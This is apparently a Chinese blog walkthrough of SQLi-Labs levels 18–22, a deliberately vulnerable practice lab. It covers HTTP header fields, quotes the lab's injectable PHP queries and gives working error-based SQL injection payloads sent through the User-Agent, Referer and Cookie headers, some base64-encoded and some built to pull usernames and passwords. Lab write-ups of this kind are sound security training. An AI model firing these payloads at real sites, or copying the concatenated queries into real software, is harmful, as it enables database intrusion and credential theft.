SQL-LABS入门到放弃7(part1)

前言

接下去的几个关卡涉及到了http头部的一些内容,我们需要简单的了解一下这些http头部字段。
详细介绍

User-Agent

浏览器表明自己的身份(是哪种浏览器);

1
2
例如:User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; 
rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

Referer

浏览器向 WEB 服务器表明自己是从哪个 网页/URL 获得/点击 当前请求中的网址/URL;

1
例如:Referer:http://www.sina.com/

指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密);

1
Cookie:userId=C5bYpXrimdmsiQmsBPnE1Vn8ZQmdWSm3WRlEB3vRwTnRtW <-- Cookie

Less-18

  1. 题目提示Less-18 Header Injection- Error Based- string
    这里我们查看源码可知这里对uname和passwd都进行了预处理,我们没办法通过这两个参数注入;

    1
    2
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
  2. 查看SQL查询语句,发现可以通过uagent进行注入;

    1
    2
    3
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
  3. 构造报错语句(这里使用的是单引号处理参数,需要注意闭合单引号)

    1
    'and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)) and '1'='1

Less-19

  1. 题目提示Less-19 Header Injection- Referer- Error Based- string
    这里应该注入点是referer,查看关键源码

    1
    2
    3
    4
    5
    6
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
  2. 构造报错语句

    1
    2
    3
    'and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)) and '1'='1

    'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and '1'='1

Less-20

  1. 题目提示Less-20 Cookie Injection- Error Based- string
    这里应该是利用cookie进行注入,查看关键源码

    1
    2
    3
    4
    5
    6
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
  2. 从源代码我们可以看到cookie从username中获取值,当再次刷新时,会从cookie中读取username,然后进行查询,登陆成功后,当我们修改cookie,再次刷新时,sql语句就会被修改了。

    1
    2
    3
    cookie:uname=admin1'and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))#

    cookie:uname=admin1'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

Less-21

  1. 题目提示Less-21 Cookie Injection- Error Based- complex - string
    这里应该还是cookie注入,不过需要做一下base64编码(cookie该有单引号和括号的处理)

    1
    2
    3
    4
    5
    6
    7
    8
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $cookee = base64_decode($cookee);

    $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
  2. 我们将SQL语句先base64编码然后进行报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    编码前:
    admin') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

    编码后:
    YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLDB4N2UpLDEpIw==

    编码前:
    admin') and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    编码后:
    YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKFNFTEVDVCBkaXN0aW5jdCBjb25jYXQoMHgyMyx1c2VybmFtZSwweDNhLHBhc3N3b3JkLDB4MjMpIEZST00gdXNlcnMgbGltaXQgMCwxKSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGxpbWl0IDAsMSksZmxvb3IocmFuZCgwKSoyKSl4IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBncm91cCBieSB4KWEpIw==

Less-22

  1. 题目提示Less-22 Cookie Injection- Error Based- Double Quotes - string
    应该是进行双引号的处理,我们通过测试admin"验证了这一想法;

    1
    your MySQL server version for the right syntax to use near '"admin"" LIMIT 0,1' at line 1
  2. 关键源码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

    $cookee = base64_decode($cookee);
    $cookee1 = '"'. $cookee. '"';

    $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
  3. 我们将SQL语句先base64编码然后进行报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    编码前:
    admin" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#

    编码后:
    YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSksMHg3ZSksMSkj

    编码前:
    admin" and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    编码后:
    YWRtaW4iIGFuZCAoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIGRpc3RpbmN0IGNvbmNhdCgweDIzLHVzZXJuYW1lLDB4M2EscGFzc3dvcmQsMHgyMykgRlJPTSB1c2VycyBsaW1pdCAyLDEpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj

后记

这里只使用了报错注入,没有对联合注入和盲注进行尝试(有点迷),感觉应该是一样的,你留下一个问题以后补充。

------ 本文结束感谢您的阅读 ------
坚持记录生活,您的支持将鼓励我继续创作!